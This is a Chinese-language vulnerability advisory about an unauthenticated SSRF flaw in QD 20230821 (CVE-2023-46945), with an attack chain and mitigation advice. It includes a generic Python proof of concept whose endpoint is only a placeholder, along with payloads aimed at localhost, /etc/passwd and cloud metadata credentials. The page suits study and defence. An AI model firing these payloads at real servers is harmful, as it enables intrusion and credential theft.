IPBUF安全漏洞报告
English
CVE-2023-46945 CVSS 9.1 严重

CVE-2023-46945 QD服务端请求伪造漏洞

披露日期: 2026-04-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2023-46945
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
QD

相关标签

SSRFQD服务端请求伪造CVE-2023-46945严重漏洞

漏洞概述

QD 20230821版本存在严重的SSRF漏洞。由于未对用户请求进行充分过滤,攻击者可诱导服务器访问内网资源,导致敏感信息泄露。

技术细节

该漏洞发生于QD 20230821版本。攻击者通过发送特制的网络请求,利用应用程序对目标地址校验缺失的缺陷,迫使服务器向攻击者指定的内网地址(如本地回环地址、云服务元数据端点)发起连接。由于攻击无需用户交互和身份认证,且CVSS评分高达9.1,攻击者可利用此漏洞绕过防火墙限制,探测内网拓扑结构,读取本地敏感文件,或获取云平台临时凭证,进而对内网系统发起进一步攻击,严重威胁系统的机密性与完整性。

攻击链分析

STEP 1
1. 信息收集
攻击者识别互联网上暴露的QD 20230821版本应用服务。
STEP 2
2. 构造恶意请求
攻击者向存在漏洞的接口发送包含内网地址(如127.0.0.1或云元数据地址)的特制请求。
STEP 3
3. 服务端请求发起
QD服务器接收请求后,未经验证即向攻击者指定的内网目标发起HTTP请求。
STEP 4
4. 获取敏感信息
攻击者根据服务器返回的响应内容,获取内网服务信息、本地文件或云凭证。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable QD application target_url = "http://<target_ip>:<port>/api/endpoint" # Malicious payload demonstrating SSRF (e.g., accessing local metadata) # Common test payloads: http://127.0.0.1, file:///etc/passwd, http://169.254.169.254/latest/meta-data/ payload = { "url": "http://127.0.0.1:8080" } try: # Send the crafted request to trigger the vulnerability response = requests.post(target_url, data=payload, timeout=10) # Check if the request was successful if response.status_code == 200: print("[+] SSRF Triggered successfully!") print("Response:", response.text) else: print("[-] Failed to trigger SSRF. Status code:", response.status_code) except Exception as e: print("Error:", str(e))

影响范围

QD 20230821

防御指南

临时缓解措施
建议在网络边界部署防火墙或WAF规则,拦截指向内网IP段(如127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)及云元数据服务(169.254.169.254)的出站流量,以缓解漏洞被利用的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表